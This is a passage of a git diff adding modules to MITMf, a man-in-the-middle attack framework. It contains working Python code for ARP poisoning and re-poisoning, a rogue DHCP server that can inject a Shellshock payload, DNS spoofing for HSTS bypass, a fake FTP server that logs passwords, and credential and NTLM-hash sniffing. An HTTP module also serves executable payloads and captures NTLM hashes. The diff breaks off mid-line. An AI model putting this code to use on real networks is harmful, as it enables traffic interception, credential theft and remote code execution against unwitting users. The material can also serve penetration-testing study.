+ if header.startswith(method): + http_line = header + return http_line + +def parse_netntlm_chal(headers, chal_header, ack): + ''' + Parse the netntlm server challenge + https://code.google.com/p/python-ntlm/source/browse/trunk/python26/ntlm/ntlm.py + ''' + try: + header_val2 = headers[chal_header] + except KeyError: + return + header_val2 = header_val2.split(' ', 1) + # The header value can either start with NTLM or Negotiate + if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate': + msg2 = header_val2[1] + msg2 = base64.decodestring(msg2) + parse_ntlm_chal(ack, msg2) + +def parse_ntlm_chal(msg2, ack): + ''' + Parse server challenge + ''' + global challenge_acks + + Signature = msg2[0:8] + try: + msg_type = struct.unpack(" 50: + challenge_acks.popitem(last=False) + challenge_acks[ack] = ServerChallenge + +def parse_netntlm_resp_msg(headers, resp_header, seq): + ''' + Parse the client response to the challenge + ''' + try: + header_val3 = headers[resp_header] + except KeyError: + return + header_val3 = header_val3.split(' ', 1) + + # The header value can either start with NTLM or Negotiate + if header_val3[0] == 'NTLM' or header_val3[0] == 'Negotiate': + try: + msg3 = base64.decodestring(header_val3[1]) + except binascii.Error: + return + return parse_ntlm_resp(msg3, seq) + +def parse_ntlm_resp(msg3, seq): + ''' + Parse the 3rd msg in NTLM handshake + Thanks to psychomario + ''' + + if seq in challenge_acks: + challenge = challenge_acks[seq] + else: + challenge = 'CHALLENGE NOT FOUND' + + if len(msg3) > 43: + # Thx to psychomario for below + lmlen, lmmax, lmoff, ntlen, ntmax, ntoff, domlen, dommax, domoff, userlen, usermax, useroff = struct.unpack("12xhhihhihhihhi", msg3[:44]) + lmhash = binascii.b2a_hex(msg3[lmoff:lmoff+lmlen]) + nthash = binascii.b2a_hex(msg3[ntoff:ntoff+ntlen]) + domain = msg3[domoff:domoff+domlen].replace("\0", "") + user = msg3[useroff:useroff+userlen].replace("\0", "") + # Original check by psychomario, might be incorrect? 
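+        # Length heuristic: an LM/NTLMv1 response is a fixed 24-byte field, while an NTLMv2
+        # response is a variable-length blob (16-byte HMAC followed by target info), so a
+        # response field well past 60 bytes is treated as v2.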
+ #if lmhash != "0"*48: #NTLMv1 + if ntlen == 24: #NTLMv1 + msg = '%s %s' % ('NETNTLMv1:', user+"::"+domain+":"+lmhash+":"+nthash+":"+challenge) + return msg + elif ntlen > 60: #NTLMv2 + msg = '%s %s' % ('NETNTLMv2:', user+"::"+domain+":"+challenge+":"+nthash[:32]+":"+nthash[32:]) + return msg + +def url_filter(http_url_req): + ''' + Filter out the common but uninteresting URLs + ''' + if http_url_req: + d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff'] + if any(http_url_req.endswith(i) for i in d): + return + + return http_url_req + +def get_login_pass(body): + ''' + Regex out logins and passwords from a string + ''' + user = None + passwd = None + + # Taken mainly from Pcredz by Laurent Gaffie + userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name', + 'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname', + 'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename', + 'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username', + 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in'] + passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword', + 'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password' + 'passwort', 'passwrd', 'wppassword', 'upasswd'] + + for login in userfields: + login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE) + if login_re: + user = login_re.group() + for passfield in passfields: + pass_re = re.search('(%s=[^&]+)' % passfield, body, re.IGNORECASE) + if pass_re: + passwd = pass_re.group() + + if user and passwd: + return (user, passwd) + +def printer(src_ip_port, dst_ip_port, msg): + if dst_ip_port != None: + print_str = '[{} > {}] {}'.format(src_ip_port, dst_ip_port, msg) + # All credentials will have dst_ip_port, URLs will not + + mitmf_logger.info("[NetCreds] {}".format(print_str)) + else: + print_str = '[{}] {}'.format(src_ip_port.split(':')[0], msg) + mitmf_logger.info("[NetCreds] {}".format(print_str)) diff --git a/core/netcreds/README.md b/core/netcreds/README.md new file mode 100644 index 0000000..e5e5871 --- /dev/null +++ b/core/netcreds/README.md @@ -0,0 +1,64 @@ +Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification. 
+ +| Screenshots | +|:-----:| +| ![Screenie1](http://imgur.com/opQo7Bb.png) | +| ![Screenie2](http://imgur.com/Kl5I6Ju.png) | + +###Sniffs + +* URLs visited +* POST loads sent +* HTTP form logins/passwords +* HTTP basic auth logins/passwords +* HTTP searches +* FTP logins/passwords +* IRC logins/passwords +* POP logins/passwords +* IMAP logins/passwords +* Telnet logins/passwords +* SMTP logins/passwords +* SNMP community string +* NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc +* Kerberos + + +###Examples + +Auto-detect the interface to sniff + +```sudo python net-creds.py``` + +Choose eth0 as the interface + +```sudo python net-creds.py -i eth0``` + +Ignore packets to and from 192.168.0.2 + +```sudo python net-creds.py -f 192.168.0.2``` + +Read from pcap + +```python net-creds.py -p pcapfile``` + + +####OSX + +Credit to [epocs](https://github.com/epocs): +``` +sudo easy_install pip +sudo pip install scapy +sudo pip install pcapy +brew install libdnet --with-python +mkdir -p /Users//Library/Python/2.7/lib/python/site-packages +echo 'import site; site.addsitedir("/usr/local/lib/python2.7/site-packages")' >> /Users//Library/Python/2.7/lib/python/site-packages/homebrew.pth +sudo pip install pypcap +brew tap brona/iproute2mac +brew install iproute2mac +``` +Then replace line 74 '/sbin/ip' with '/usr/local/bin/ip'. + + +####Thanks +* Laurent Gaffie +* psychomario diff --git a/core/wrappers/__init__.py b/core/netcreds/__init__.py similarity index 100% rename from core/wrappers/__init__.py rename to core/netcreds/__init__.py diff --git a/core/protocols/__init__.py b/core/protocols/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/protocols/arp/ARPWatch.py b/core/protocols/arp/ARPWatch.py new file mode 100644 index 0000000..28f2473 --- /dev/null +++ b/core/protocols/arp/ARPWatch.py @@ -0,0 +1,86 @@ +import logging +import os +import sys +import threading + +from scapy.all import * + +mitmf_logger = logging.getLogger('mitmf') + +class ARPWatch: + + def __init__(self, gatewayip, myip, interface): + self.gatewayip = gatewayip + self.gatewaymac = None + self.myip = myip + self.interface = interface + self.debug = False + self.watch = True + + def start(self): + try: + self.gatewaymac = getmacbyip(self.gatewayip) + if self.gatewaymac is None: + sys.exit("[ARPWatch] Error: Could not resolve gateway's MAC address") + except Exception, e: + sys.exit("[ARPWatch] Exception occured while resolving gateway's MAC address: {}".format(e)) + + mitmf_logger.debug("[ARPWatch] gatewayip => {}".format(self.gatewayip)) + mitmf_logger.debug("[ARPWatch] gatewaymac => {}".format(self.gatewaymac)) + mitmf_logger.debug("[ARPWatch] myip => {}".format(self.myip)) + mitmf_logger.debug("[ARPWatch] interface => {}".format(self.interface)) + + t = threading.Thread(name='ARPWatch', target=self.startARPWatch) + t.setDaemon(True) + t.start() + + def stop(self): + mitmf_logger.debug("[ARPWatch] shutting down") + self.watch = False + + def startARPWatch(self): + sniff(prn=self.arp_monitor_callback, filter="arp", store=0) + + def arp_monitor_callback(self, pkt): + if self.watch is True: #Prevents sending packets on exiting + if ARP in pkt and pkt[ARP].op == 1: #who-has only + #broadcast mac is 00:00:00:00:00:00 + packet = None + #print str(pkt[ARP].hwsrc) #mac of sender + #print str(pkt[ARP].psrc) #ip of sender + #print str(pkt[ARP].hwdst) #mac of destination (often broadcst) + #print str(pkt[ARP].pdst) #ip of destination (Who is ...?) 
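+                # Three re-poison cases (matching the log messages below): a victim ARPing for
+                # the gateway and the gateway ARPing for a victim both get replies carrying our
+                # MAC, while the gateway ARPing for our own IP gets a genuine reply for this host.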
+ + if (str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and str(pkt[ARP].pdst) == self.gatewayip and self.myip != str(pkt[ARP].psrc)): + mitmf_logger.debug("[ARPWatch] {} is asking where the Gateway is. Sending reply: I'm the gateway biatch!'".format(pkt[ARP].psrc)) + #send repoison packet + packet = ARP() + packet.op = 2 + packet.psrc = self.gatewayip + packet.hwdst = str(pkt[ARP].hwsrc) + packet.pdst = str(pkt[ARP].psrc) + + elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip != str(pkt[ARP].pdst)): + mitmf_logger.debug("[ARPWatch] Gateway asking where {} is. Sending reply: I'm {} biatch!".format(pkt[ARP].pdst, pkt[ARP].pdst)) + #send repoison packet + packet = ARP() + packet.op = 2 + packet.psrc = self.gatewayip + packet.hwdst = '00:00:00:00:00:00' + packet.pdst = str(pkt[ARP].pdst) + + elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip == str(pkt[ARP].pdst)): + mitmf_logger.debug("[ARPWatch] Gateway asking where {} is. Sending reply: This is the h4xx0r box!".format(pkt[ARP].pdst)) + + packet = ARP() + packet.op = 2 + packet.psrc = self.myip + packet.hwdst = str(pkt[ARP].hwsrc) + packet.pdst = str(pkt[ARP].psrc) + + try: + if packet is not None: + send(packet, verbose=self.debug, iface=self.interface) + except Exception, e: + mitmf_logger.error("[ARPWatch] Error sending re-poison packet: {}".format(e)) + pass diff --git a/core/protocols/arp/ARPpoisoner.py b/core/protocols/arp/ARPpoisoner.py new file mode 100644 index 0000000..122e3fd --- /dev/null +++ b/core/protocols/arp/ARPpoisoner.py @@ -0,0 +1,148 @@ +import logging +import threading +from time import sleep +from scapy.all import * + +mitmf_logger = logging.getLogger('mitmf') + +class ARPpoisoner(): + + def __init__(self, gateway, interface, mac, targets): + + self.gatewayip = gateway + self.gatewaymac = getmacbyip(gateway) + self.mymac = mac + self.targets = self.getTargetRange(targets) + self.targetmac = None + self.interface = interface + self.arpmode = 'rep' + self.debug = False + self.send = True + self.interval = 3 + + def getTargetRange(self, targets): + if targets is None: + return None + + targetList = list() + targets = targets.split(",") + for target in targets: + if "-" in target: + max_range = int(target.split("-")[1]) + octets = target.split("-")[0].split(".") + f3_octets = ".".join(octets[0:3]) + l_octet = int(octets[3]) + + for ip in xrange(l_octet, max_range+1): + targetList.append('{}.{}'.format(f3_octets, ip)) + else: + targetList.append(target) + + return targetList + + def start(self): + if self.gatewaymac is None: + sys.exit("[ARPpoisoner] Error: Could not resolve gateway's MAC address") + + mitmf_logger.debug("[ARPpoisoner] gatewayip => {}".format(self.gatewayip)) + mitmf_logger.debug("[ARPpoisoner] gatewaymac => {}".format(self.gatewaymac)) + mitmf_logger.debug("[ARPpoisoner] targets => {}".format(self.targets)) + mitmf_logger.debug("[ARPpoisoner] targetmac => {}".format(self.targetmac)) + mitmf_logger.debug("[ARPpoisoner] mymac => {}".format(self.mymac)) + mitmf_logger.debug("[ARPpoisoner] interface => {}".format(self.interface)) + mitmf_logger.debug("[ARPpoisoner] arpmode => {}".format(self.arpmode)) + mitmf_logger.debug("[ARPpoisoner] interval => {}".format(self.interval)) + + if self.arpmode == 'rep': + t = threading.Thread(name='ARPpoisoner-rep', target=self.poisonARPrep) + + elif self.arpmode == 'req': + t = threading.Thread(name='ARPpoisoner-req', target=self.poisonARPreq) + + t.setDaemon(True) + 
t.start() + + def stop(self): + self.send = False + sleep(3) + self.interval = 1 + + if self.targets: + self.restoreTarget(2) + + elif self.targets is None: + self.restoreNet(5) + + def poisonARPrep(self): + while self.send: + + if self.targets is None: + pkt = Ether(src=self.mymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mymac, psrc=self.gatewayip, op="is-at") + sendp(pkt, iface=self.interface, verbose=self.debug) #sends at layer 2 + + elif self.targets: + #Since ARP spoofing relies on knowing the targets MAC address, this whole portion is just error handling in case we can't resolve it + for targetip in self.targets: + try: + targetmac = getmacbyip(targetip) + + if targetmac is None: + mitmf_logger.error("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip)) + + elif targetmac: + send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="is-at"), iface=self.interface, verbose=self.debug) + send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="is-at", ), iface=self.interface, verbose=self.debug) + + except Exception, e: + mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e)) + pass + + sleep(self.interval) + + def poisonARPreq(self): + while self.send: + + if self.targets is None: + pkt = Ether(src=self.mymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mymac, psrc=self.gatewayip, op="who-has") + sendp(pkt, iface=self.interface, verbose=self.debug) #sends at layer 2 + + elif self.targets: + for targetip in self.targets: + try: + targetmac = getmacbyip(targetip) + + if targetmac is None: + mitmf_logger.error("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip)) + + elif targetmac: + send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="who-has"), iface=self.interface, verbose=self.debug) + send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="who-has"), iface=self.interface, verbose=self.debug) + + except Exception, e: + mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e)) + pass + + sleep(self.interval) + + def restoreNet(self, count): + mitmf_logger.info("[ARPpoisoner] Restoring subnet connection with {} packets".format(count)) + pkt = Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.gatewaymac, psrc=self.gatewayip, op="is-at") + sendp(pkt, inter=self.interval, count=count, iface=self.interface, verbose=self.debug) #sends at layer 2 + + def restoreTarget(self, count): + for targetip in self.targets: + try: + targetmac = getmacbyip(targetip) + + if targetmac is None: + mitmf_logger.error("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip)) + + elif targetmac: + mitmf_logger.info("[ARPpoisoner] Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count)) + + send(ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac), iface=self.interface, count=count, verbose=self.debug) + send(ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac), iface=self.interface, count=count, verbose=self.debug) + + except Exception, e: + mitmf_logger.error("[ARPpoisoner] Exception occurred while restoring connection {}: {}".format(targetip, e)) + pass diff --git a/core/protocols/arp/__init__.py b/core/protocols/arp/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/protocols/dhcp/DHCPServer.py b/core/protocols/dhcp/DHCPServer.py new file mode 100644 index 
0000000..80ab8c6 --- /dev/null +++ b/core/protocols/dhcp/DHCPServer.py @@ -0,0 +1,107 @@ +import logging +import threading +import binascii +import random + +logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy +from scapy.all import * + +mitmf_logger = logging.getLogger('mitmf') + +class DHCPServer(): + + def __init__(self, interface, dhcpcfg, ip, mac): + self.interface = interface + self.ip_address = ip + self.mac_address = mac + self.shellshock = None + self.debug = False + self.dhcpcfg = dhcpcfg + self.rand_number = [] + self.dhcp_dic = {} + + def start(self): + t = threading.Thread(name="dhcp_spoof", target=self.dhcp_sniff, args=(self.interface,)) + t.setDaemon(True) + t.start() + + def dhcp_sniff(self, interface): + sniff(filter="udp and (port 67 or 68)", prn=self.dhcp_callback, iface=interface) + + def dhcp_rand_ip(self): + pool = self.dhcpcfg['ip_pool'].split('-') + trunc_ip = pool[0].split('.'); del(trunc_ip[3]) + max_range = int(pool[1]) + min_range = int(pool[0].split('.')[3]) + number_range = range(min_range, max_range) + for n in number_range: + if n in self.rand_number: + number_range.remove(n) + rand_number = random.choice(number_range) + self.rand_number.append(rand_number) + rand_ip = '.'.join(trunc_ip) + '.' + str(rand_number) + + return rand_ip + + def dhcp_callback(self, resp): + if resp.haslayer(DHCP): + xid = resp[BOOTP].xid + mac_addr = resp[Ether].src + raw_mac = binascii.unhexlify(mac_addr.replace(":", "")) + if xid in self.dhcp_dic.keys(): + client_ip = self.dhcp_dic[xid] + else: + client_ip = self.dhcp_rand_ip() + self.dhcp_dic[xid] = client_ip + + if resp[DHCP].options[0][1] is 1: + mitmf_logger.info("Got DHCP DISCOVER from: " + mac_addr + " xid: " + hex(xid)) + mitmf_logger.info("Sending DHCP OFFER") + packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') / + IP(src=self.ip_address, dst='255.255.255.255') / + UDP(sport=67, dport=68) / + BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) / + DHCP(options=[("message-type", "offer"), + ('server_id', self.ip_address), + ('subnet_mask', self.dhcpcfg['subnet']), + ('router', self.ip_address), + ('lease_time', 172800), + ('renewal_time', 86400), + ('rebinding_time', 138240), + "end"])) + + try: + packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server']))) + except KeyError: + pass + + sendp(packet, iface=self.interface, verbose=self.debug) + + if resp[DHCP].options[0][1] is 3: + mitmf_logger.info("Got DHCP REQUEST from: " + mac_addr + " xid: " + hex(xid)) + packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') / + IP(src=self.ip_address, dst='255.255.255.255') / + UDP(sport=67, dport=68) / + BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) / + DHCP(options=[("message-type", "ack"), + ('server_id', self.ip_address), + ('subnet_mask', self.dhcpcfg['subnet']), + ('router', self.ip_address), + ('lease_time', 172800), + ('renewal_time', 86400), + ('rebinding_time', 138240)])) + + try: + packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server']))) + except KeyError: + pass + + if self.shellshock: + mitmf_logger.info("Sending DHCP ACK with shellshock payload") + packet[DHCP].options.append(tuple((114, "() { ignored;}; " + self.shellshock))) + packet[DHCP].options.append("end") + else: + mitmf_logger.info("Sending DHCP ACK") + packet[DHCP].options.append("end") + + sendp(packet, iface=self.interface, verbose=self.debug) \ No newline at end of 
file diff --git a/core/protocols/dhcp/__init__.py b/core/protocols/dhcp/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/protocols/dns/DNSServer.py b/core/protocols/dns/DNSServer.py new file mode 100644 index 0000000..19ecd81 --- /dev/null +++ b/core/protocols/dns/DNSServer.py @@ -0,0 +1,101 @@ +################################################################################## +#DNS Stuff starts here(not Used) +################################################################################## + +#Function name self-explanatory + +class DNSServer(): + + def serve_thread_udp(host, port, handler): + try: + server = ThreadingUDPServer((host, port), handler) + server.serve_forever() + except Exception, e: + print "Error starting UDP server on port %s: %s:" % (str(port),str(e)) + + def start(DNS_On_Off): + if DNS_On_Off == "ON": + t1 = threading.Thread(name="DNS", target=self.serve_thread_udp, args=("0.0.0.0", 53,DNS)) + t2 = threading.Thread(name="DNSTCP", target=self.serve_thread_udp, args=("0.0.0.0", 53,DNSTCP)) + for t in [t1, t2]: + t.setDaemon(True) + t.start() + + if DNS_On_Off == "OFF": + return False + +class ThreadingUDPServer(ThreadingMixIn, UDPServer): + + allow_reuse_address = 1 + + def server_bind(self): + UDPServer.server_bind(self) + +def ParseDNSType(data): + QueryTypeClass = data[len(data)-4:] + if QueryTypeClass == "\x00\x01\x00\x01":#If Type A, Class IN, then answer. + return True + else: + return False + +#DNS Answer packet. +class DNSAns(Packet): + fields = OrderedDict([ + ("Tid", ""), + ("Flags", "\x80\x10"), + ("Question", "\x00\x01"), + ("AnswerRRS", "\x00\x01"), + ("AuthorityRRS", "\x00\x00"), + ("AdditionalRRS", "\x00\x00"), + ("QuestionName", ""), + ("QuestionNameNull", "\x00"), + ("Type", "\x00\x01"), + ("Class", "\x00\x01"), + ("AnswerPointer", "\xc0\x0c"), + ("Type1", "\x00\x01"), + ("Class1", "\x00\x01"), + ("TTL", "\x00\x00\x00\x1e"), #30 secs, dont mess with their cache for too long.. + ("IPLen", "\x00\x04"), + ("IP", "\x00\x00\x00\x00"), + ]) + + def calculate(self,data): + self.fields["Tid"] = data[0:2] + self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1]) + self.fields["IP"] = inet_aton(OURIP) + self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"])) + +# DNS Server class. 
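+#Answers any Type A / Class IN query with OURIP (set in DNSAns.calculate), unless the query comes from 127.0.0.1.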
+class DNS(BaseRequestHandler): + + def handle(self): + data, soc = self.request + if self.client_address[0] == "127.0.0.1": + pass + elif ParseDNSType(data): + buff = DNSAns() + buff.calculate(data) + soc.sendto(str(buff), self.client_address) + #print "DNS Answer sent to: %s "%(self.client_address[0]) + responder_logger.info('DNS Answer sent to: %s'%(self.client_address[0])) + +class DNSTCP(BaseRequestHandler): + + def handle(self): + try: + data = self.request.recv(1024) + if self.client_address[0] == "127.0.0.1": + pass + elif ParseDNSType(data): + buff = DNSAns() + buff.calculate(data) + self.request.send(str(buff)) + #print "DNS Answer sent to: %s "%(self.client_address[0]) + responder_logger.info('DNS Answer sent to: %s'%(self.client_address[0])) + + except Exception: + pass + +################################################################################## +#DNS Stuff ends here (not Used) +################################################################################## \ No newline at end of file diff --git a/core/protocols/dns/DNSnfqueue.py b/core/protocols/dns/DNSnfqueue.py new file mode 100644 index 0000000..ec1b255 --- /dev/null +++ b/core/protocols/dns/DNSnfqueue.py @@ -0,0 +1,130 @@ + +class DNSnfqueue(): + + hsts = False + dns = False + hstscfg = None + dnscfg = None + _instance = None + nfqueue = None + queue_number = 0 + + def __init__(self): + self.nfqueue = NetfilterQueue() + t = threading.Thread(name='nfqueue', target=self.bind, args=()) + t.setDaemon(True) + t.start() + + @staticmethod + def getInstance(): + if _DNS._instance is None: + _DNS._instance = _DNS() + + return _DNS._instance + + @staticmethod + def checkInstance(): + if _DNS._instance is None: + return False + else: + return True + + def bind(self): + self.nfqueue.bind(self.queue_number, self.callback) + self.nfqueue.run() + + def stop(self): + try: + self.nfqueue.unbind() + except: + pass + + def enableHSTS(self, config): + self.hsts = True + self.hstscfg = config + + def enableDNS(self, config): + self.dns = True + self.dnscfg = config + + def resolve_domain(self, domain): + try: + mitmf_logger.debug("Resolving -> %s" % domain) + answer = dns.resolver.query(domain, 'A') + real_ips = [] + for rdata in answer: + real_ips.append(rdata.address) + + if len(real_ips) > 0: + return real_ips + + except Exception: + mitmf_logger.info("Error resolving " + domain) + + def callback(self, payload): + try: + #mitmf_logger.debug(payload) + pkt = IP(payload.get_payload()) + + if not pkt.haslayer(DNSQR): + payload.accept() + return + + if pkt.haslayer(DNSQR): + mitmf_logger.debug("Got DNS packet for %s %s" % (pkt[DNSQR].qname, pkt[DNSQR].qtype)) + if self.dns: + for k, v in self.dnscfg.items(): + if k in pkt[DNSQR].qname: + self.modify_dns(payload, pkt, v) + return + + payload.accept() + + elif self.hsts: + if (pkt[DNSQR].qtype is 28 or pkt[DNSQR].qtype is 1): + for k,v in self.hstscfg.items(): + if v == pkt[DNSQR].qname[:-1]: + ip = self.resolve_domain(k) + if ip: + self.modify_dns(payload, pkt, ip) + return + + if 'wwww' in pkt[DNSQR].qname: + ip = self.resolve_domain(pkt[DNSQR].qname[1:-1]) + if ip: + self.modify_dns(payload, pkt, ip) + return + + if 'web' in pkt[DNSQR].qname: + ip = self.resolve_domain(pkt[DNSQR].qname[3:-1]) + if ip: + self.modify_dns(payload, pkt, ip) + return + + payload.accept() + + except Exception, e: + print "Exception occurred in nfqueue callback: " + str(e) + + def modify_dns(self, payload, pkt, ip): + try: + spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\ + UDP(dport=pkt[UDP].sport, 
sport=pkt[UDP].dport) /\ + DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd) + + if self.hsts: + spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip[0]); del ip[0] #have to do this first to initialize the an field + for i in ip: + spoofed_pkt[DNS].an.add_payload(DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=i)) + mitmf_logger.info("%s Resolving %s for HSTS bypass (DNS)" % (pkt[IP].src, pkt[DNSQR].qname[:-1])) + payload.set_payload(str(spoofed_pkt)) + payload.accept() + + if self.dns: + spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip) + mitmf_logger.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1])) + payload.set_payload(str(spoofed_pkt)) + payload.accept() + + except Exception, e: + print "Exception occurred while modifying DNS: " + str(e) \ No newline at end of file diff --git a/core/protocols/dns/__init__.py b/core/protocols/dns/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/protocols/ftp/FTPServer.py b/core/protocols/ftp/FTPServer.py new file mode 100644 index 0000000..98d65ae --- /dev/null +++ b/core/protocols/ftp/FTPServer.py @@ -0,0 +1,71 @@ +################################################################################## +#FTP Stuff starts here +################################################################################## + +class FTPServer(): + + def serve_thread_tcp(host, port, handler): + try: + server = ThreadingTCPServer((host, port), handler) + server.serve_forever() + except Exception, e: + print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + + #Function name self-explanatory + def start(FTP_On_Off): + if FTP_On_Off == "ON": + t = threading.Thread(name="FTP", target=self.serve_thread_tcp, args=("0.0.0.0", 21, FTP)) + t.setDaemon(True) + t.start() + + if FTP_On_Off == "OFF": + return False + +class ThreadingTCPServer(ThreadingMixIn, TCPServer): + + allow_reuse_address = 1 + + def server_bind(self): + TCPServer.server_bind(self) + +class FTPPacket(Packet): + fields = OrderedDict([ + ("Code", "220"), + ("Separator", "\x20"), + ("Message", "Welcome"), + ("Terminator", "\x0d\x0a"), + ]) + +#FTP server class. 
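+#The FTP handler below speaks just enough of the protocol to harvest credentials:
+#it sends the 220 banner, answers USER with 331 ("need password"), writes the
+#captured USER:PASS pair to ./logs/responder/, then returns 530 so no real
+#session is ever granted.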
+class FTP(BaseRequestHandler): + + def handle(self): + try: + self.request.send(str(FTPPacket())) + data = self.request.recv(1024) + if data[0:4] == "USER": + User = data[5:].replace("\r\n","") + #print "[+]FTP User: ", User + responder_logger.info('[+]FTP User: %s'%(User)) + t = FTPPacket(Code="331",Message="User name okay, need password.") + self.request.send(str(t)) + data = self.request.recv(1024) + if data[0:4] == "PASS": + Pass = data[5:].replace("\r\n","") + Outfile = "./logs/responder/FTP-Clear-Text-Password-"+self.client_address[0]+".txt" + WriteData(Outfile,User+":"+Pass, User+":"+Pass) + #print "[+]FTP Password is: ", Pass + responder_logger.info('[+]FTP Password is: %s'%(Pass)) + t = FTPPacket(Code="530",Message="User not logged in.") + self.request.send(str(t)) + data = self.request.recv(1024) + else : + t = FTPPacket(Code="502",Message="Command not implemented.") + self.request.send(str(t)) + data = self.request.recv(1024) + except Exception: + pass + +################################################################################## +#FTP Stuff ends here +################################################################################## \ No newline at end of file diff --git a/core/protocols/ftp/__init__.py b/core/protocols/ftp/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/protocols/http/HTTPProxy.py b/core/protocols/http/HTTPProxy.py new file mode 100644 index 0000000..73db00a --- /dev/null +++ b/core/protocols/http/HTTPProxy.py @@ -0,0 +1,240 @@ +################################################################################## +#HTTP Proxy Stuff starts here (Not Used) +################################################################################## + +class HTTPProxy(): + + def serve_thread_tcp(host, port, handler): + try: + server = ThreadingTCPServer((host, port), handler) + server.serve_forever() + except Exception, e: + print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + + def start(on_off): + if on_off == "ON": + t = threading.Thread(name="HTTP", target=self.serve_thread_tcp, args=("0.0.0.0", 80,HTTP)) + t.setDaemon(True) + t.start() + + if on_off == "OFF": + return False + +class ThreadingTCPServer(ThreadingMixIn, TCPServer): + + allow_reuse_address = 1 + + def server_bind(self): + TCPServer.server_bind(self) + +#Parse NTLMv1/v2 hash. +def ParseHTTPHash(data,client): + LMhashLen = struct.unpack(' 24: + NthashLen = 64 + DomainLen = struct.unpack('2: + PostData = '[+]The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip()) + #print PostData + responder_logger.info(PostData) + +#Handle HTTP packet sequence. 
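+#PacketSequence() below dispatches on the request's Authorization header: an NTLM
+#type 1 message is answered with the fixed server challenge, a type 3 message has
+#its NetNTLM response parsed and logged via ParseHTTPHash(), Basic credentials are
+#base64-decoded and written to disk, and anything else gets an authentication
+#request (Basic or NTLM, depending on configuration). Requests for .exe files can
+#also be served a payload when that option is enabled.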
+def PacketSequence(data,client): + Ntlm = re.findall('(?<=Authorization: NTLM )[^\\r]*', data) + BasicAuth = re.findall('(?<=Authorization: Basic )[^\\r]*', data) + + if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data): + File = config.get('HTTP Server', 'ExecFilename') + buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File) + buffer1.calculate() + return str(buffer1) + + if ServeEXECAlwaysOrNot(Exec_Mode_On_Off): + if IsExecutable(FILENAME): + buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME) + buffer1.calculate() + return str(buffer1) + else: + buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME)) + buffer1.calculate() + return str(buffer1) + + if Ntlm: + packetNtlm = b64decode(''.join(Ntlm))[8:9] + if packetNtlm == "\x01": + GrabURL(data,client) + GrabCookie(data,client) + r = NTLM_Challenge(ServerChallenge=Challenge) + r.calculate() + t = IIS_NTLM_Challenge_Ans() + t.calculate(str(r)) + buffer1 = str(t) + return buffer1 + if packetNtlm == "\x03": + NTLM_Auth= 